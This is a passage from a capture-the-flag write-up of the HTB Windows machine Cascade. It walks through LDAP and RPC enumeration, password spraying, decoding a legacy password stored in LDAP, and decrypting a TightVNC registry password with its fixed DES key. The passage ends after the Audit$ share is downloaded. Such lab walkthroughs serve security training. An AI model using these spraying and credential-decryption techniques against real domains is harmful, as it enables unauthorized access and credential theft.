# Cascade - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Cascade was a pleasant, medium-rated HTB Windows machine created by [VbScrub](https://twitter.com/VbScrub)

The user involves LDAP enumeration and decrypting TightVNC password.  
We need to reverse-engineer a .NET application and enumerate deleted objects in LDAP for privilege escalation.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.086s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49170/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 -oN cascade.nmap 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.084s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-18 12:32:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-11-18T12:33:02
|_  start_date: 2023-11-18T12:13:39
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -s base -b "" -LLL
dn:
currentTime: 20231118124717.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cascade,DC=local
dsServiceName: CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
defaultNamingContext: DC=cascade,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=cascade,DC=local
configurationNamingContext: CN=Configuration,DC=cascade,DC=local
rootDomainNamingContext: DC=cascade,DC=local
[--SNIP--]
highestCommittedUSN: 340103
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: CASC-DC1.cascade.local
ldapServiceName: cascade.local:casc-dc1$@CASCADE.LOCAL
serverName: CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=cascade,DC=local
[--SNIP--]
```

We have the FQDN `CASC-DC1.cascade.local` here; we can add it to `/etc/hosts`:

```text
10.10.10.182 CASC-DC1.cascade.local cascade.local CASC-DC1
```

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@d44e755bf779:~# echo '10.10.10.182 CASC-DC1.cascade.local cascade.local CASC-DC1' >> /etc/hosts
```

Testing for null session:

```console
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u '' -p '' --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\: 
SMB         10.10.10.182    445    CASC-DC1         [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u 'opcode' -p '' --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled as well.  

## RPC enumeration

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration and found users and groups.  
We could also have found them with null session in `rpcclient`:

```console
opcode@debian$ rpcclient -U "%" -c "lsaquery" 10.10.10.182
Domain Name: CASCADE
Domain Sid: S-1-5-21-3332504370-1206983947-1165150453
```

Users:

```console
opcode@debian$ rpcclient -U "%" -c "enumdomusers" 10.10.10.182
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
```

We can use `rpcclient` to generate a list of users:

```console
opcode@debian$ rpcclient -U "%" -c "enumdomusers" 10.10.10.182 | awk -F'[][]' '{print $2}' > users.txt
```

Now we can try roasting AS-REPs:

```console
opcode@debian$ GetNPUsers.py cascade.local/ -usersfile users.txt
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
```

Nothing here.

## Testing for weak passwords

Transfer the users list to the container:

```console
opcode@debian$ docker cp ~/users.txt netexec:/root/
```

We can test for instances of empty passwords or passwords that are the same as usernames:

```console
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u users.txt -p '' --continue-on-success
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u users.txt -p users.txt --no-bruteforce --continue-on-success
```

Both of them did not find anything. I also tried using `-k`, but no dice.

## Finding password in LDAP

For this step, I had to take hints. I was advised to extract the data corresponding to the user `r.thompson` from LDAP.  
On this machine, LDAP can be queried without authentication.

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts -LLL
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
```

Now that we know the base DN, we can construct distinguished names to query LDAP.  
`CN=Users,DC=cascade,DC=local` did not work. I assumed it to be an organizational unit, but `OU=Users,DC=cascade,DC=local` did not work either.  
So I looked at all DNs in `DC=cascade,DC=local`  

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' dn -LLL
dn: DC=cascade,DC=local
dn: CN=Users,DC=cascade,DC=local
dn: CN=Computers,DC=cascade,DC=local
[--SNIP--]
dn: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
[--SNIP--]
```

It has to be `OU=Users,OU=UK,DC=cascade,DC=local`:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -b 'OU=Users,OU=UK,DC=cascade,DC=local' dn -LLL
dn: OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
dn: OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Util,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
dn: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
```

`Ryan Thompson` is on the list.

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -b 'CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local' -LLL
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
[--SNIP--]
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
```

`cascadeLegacyPwd` is a suspicious attribute, with its value set to `clk0bjVldmE=`.  
Upon base64 decoding, it becomes `rY4n5eva`

```console
opcode@debian$ echo r.thompson | kerbrute passwordspray --dc 10.10.10.182 -d cascade.local - 'rY4n5eva'
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/18/23 - Ronnie Flathers @ropnop

2023/11/18 20:47:50 >  Using KDC(s):
2023/11/18 20:47:50 >  	10.10.10.182:88

2023/11/18 20:48:01 >  [+] VALID LOGIN:	 r.thompson@cascade.local:rY4n5eva
2023/11/18 20:48:01 >  Done! Tested 1 logins (1 successes) in 10.386 seconds
```

The credential set `r.thompson:rY4n5eva` is valid.

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.
Starting with SMB shares:

```console
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SMB         10.10.10.182    445    CASC-DC1         [*] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$                          
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share 
```

`Data` is not a default share; we need to explore it.  
But I would like to check a few other things first:

```console
root@d44e755bf779:~# nxc ldap 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M adcs
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.182    389    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
ADCS        10.10.10.182    389    CASC-DC1         [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@d44e755bf779:~# nxc ldap 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M maq
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.182    389    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
MAQ         10.10.10.182    389    CASC-DC1         [*] Getting the MachineAccountQuota
MAQ         10.10.10.182    389    CASC-DC1         MachineAccountQuota: 10

root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M enum_av
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
ENUM_AV     10.10.10.182    445    CASC-DC1         Found NOTHING!
```

And some groups:

```console
root@d44e755bf779:~# nxc ldap 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M group-mem -o group='Remote Management Users'
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.182    389    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
GROUP-ME... 10.10.10.182    389    CASC-DC1         [+] Found the following members of the Remote Management Users group:
GROUP-ME... 10.10.10.182    389    CASC-DC1         arksvc
GROUP-ME... 10.10.10.182    389    CASC-DC1         s.smith

root@d44e755bf779:~# nxc ldap 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M group-mem -o group='Domain Admins'
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.182    389    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
GROUP-ME... 10.10.10.182    389    CASC-DC1         [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.10.182    389    CASC-DC1         administrator

root@d44e755bf779:~# nxc ldap 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M group-mem -o group='Protected Users'
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.182    389    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
GROUP-ME... 10.10.10.182    389    CASC-DC1         [+] Unable to find any members of the "Protected Users" group

root@d44e755bf779:~# nxc ldap 10.10.10.182 -d cascade.local -u 'r.thompson' -p 'rY4n5eva' -M group-mem -o group='Domain Computers'
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.182    389    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
```

`arksvc` and `s.smith` can use WinRM.  
We can use [impacket](https://github.com/fortra/impacket)'s `smbclient.py` to explore the SMB share:

```console
opcode@debian$ smbclient.py cascade.local/r.thompson:rY4n5eva@CASC-DC1.cascade.local
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

Type help for list of commands
# use Data
# ls
drw-rw-rw-          0  Wed Jan 29 03:35:51 2020 .
drw-rw-rw-          0  Wed Jan 29 03:35:51 2020 ..
drw-rw-rw-          0  Mon Jan 13 07:15:14 2020 Contractors
drw-rw-rw-          0  Mon Jan 13 07:15:10 2020 Finance
drw-rw-rw-          0  Tue Jan 28 23:34:51 2020 IT
drw-rw-rw-          0  Mon Jan 13 07:15:20 2020 Production
drw-rw-rw-          0  Mon Jan 13 07:15:16 2020 Temps
```

There are a bunch of files and directories. `smbclient.py` cannot recursively download them all, but `smbclient` can:

```console
opcode@debian$ smbclient //cascade.local/Data -U 'r.thompson%rY4n5eva'
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt Off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (7.4 KiloBytes/sec) (average 7.4 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (3.6 KiloBytes/sec) (average 5.4 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (17.3 KiloBytes/sec) (average 9.3 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (7.5 KiloBytes/sec) (average 8.9 KiloBytes/sec)
```

## Finding credentials on SMB

I looked through all the downloaded files: `/IT/Logs/DCs/dcdiag.log` and `IT/Temp/s.smith/VNC Install.reg` are not interesting.  
`IT/Email Archives/Meeting_Notes_June_2018.html` contains an interesting info:

```html
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
```

It suggests that an account `TempAdmin` was created with the same password as that for admin.  
Also, `IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log` contains information about the `TempAdmin` being deleted:

```log
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
```

We can check it with LDAP:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.182 -D 'cascade\r.thompson' -w 'rY4n5eva' -b 'CN=Deleted Objects,DC=cascade,DC=local' -LLL
No such object (32)
Matched DN: CN=Deleted Objects,DC=cascade,DC=local
Additional information: 0000208D: NameErr: DSID-0310020A, problem 2001 (NO_OBJECT), data 0, best match of:
	'CN=Deleted Objects,DC=cascade,DC=local'
```

I think only `arksvc` can read it.  
I asked for another hint and was asked to look carefully at all files on SMB share. I had missed something critical in `IT/Temp/s.smith/VNC Install.reg`:

```console
opcode@debian$ dos2unix VNC\ Install.reg           
dos2unix: converting UTF-16LE file VNC Install.reg to UTF-8 Unix format...
opcode@debian$ cat VNC\ Install.reg                
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
[--SNIP--]
```

I should have noticed this password before. The hex also contains unprintable characters.  
Googling "tightvnc password hex", I found <https://github.com/frizb/PasswordDecrypts>  
Apparently, this hex string is DES encrypted and TightVNC uses a known fixed key, `e84ad660c4721ae0` for DES encryption.

```py
from Crypto.Cipher import DES
from binascii import unhexlify

ct = unhexlify('6bcf2a4b6e5aca0f')
key = unhexlify('e84ad660c4721ae0')

cipher = DES.new(key, DES.MODE_ECB)

pt = cipher.decrypt(ct)
print(pt.decode())
```

```console
opcode@debian$ python3 decrypt_des.py
sT333ve2
```

We can spray the password across all users:

```console
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u users.txt -p 'sT333ve2' --continue-on-success
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\CascGuest:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\arksvc:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\r.thompson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\util:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.wakefield:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\s.hickson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.goodhand:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\a.turnbull:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\e.crowe:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\b.hanson:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\d.burman:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\BackupSvc:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.allen:sT333ve2 STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\i.croft:sT333ve2 STATUS_LOGON_FAILURE 
```

It worked for `s.smith`.  
We can check if he has access to any additional shares:

```console
root@d44e755bf779:~# nxc smb 10.10.10.182 -d cascade.local -u 's.smith' -p 'sT333ve2' --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2 
SMB         10.10.10.182    445    CASC-DC1         [*] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$          READ            
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share 
```

`Audit$` is new.

```console
opcode@debian$ smbclient.py cascade.local/s.smith:sT333ve2@CASC-DC1.cascade.local
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

Type help for list of commands
# use Audit$
# ls
drw-rw-rw-          0  Wed Jan 29 23:31:26 2020 .
drw-rw-rw-          0  Wed Jan 29 23:31:26 2020 ..
-rw-rw-rw-      13312  Wed Jan 29 03:17:08 2020 CascAudit.exe
-rw-rw-rw-      12288  Wed Jan 29 23:31:26 2020 CascCrypto.dll
drw-rw-rw-          0  Wed Jan 29 03:13:18 2020 DB
-rw-rw-rw-         45  Wed Jan 29 04:59:47 2020 RunAudit.bat
-rw-rw-rw-     363520  Wed Jan 29 02:12:18 2020 System.Data.SQLite.dll
-rw-rw-rw-     186880  Wed Jan 29 02:12:18 2020 System.Data.SQLite.EF6.dll
drw-rw-rw-          0  Wed Jan 29 02:12:18 2020 x64
drw-rw-rw-          0  Wed Jan 29 02:12:18 2020 x86
```

Once again, `smbclient` has to be used to download them all recursively:

```console
opcode@debian$ smbclient //cascade.local/Audit$ -U 's.smith%sT333ve2'            
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt Off
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (29.6 KiloBytes/sec) (average 29.6 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (35.3 KiloBytes/sec) (average 32.1 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.1 KiloBytes/sec) (average 21.8 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (529.9 KiloBytes/sec) (average 208.7 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (377.1 KiloBytes/sec) (average 244.1 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as DB/Audit.db (69.8 KiloBytes/sec) (average 221.4 KiloBytes/sec)
getting file \x64\SQLite.Interop.dll of size 1639936 as x64/SQLite.Interop.dll (1509.4 KiloBytes/sec) (average 589.8 KiloBytes/sec)
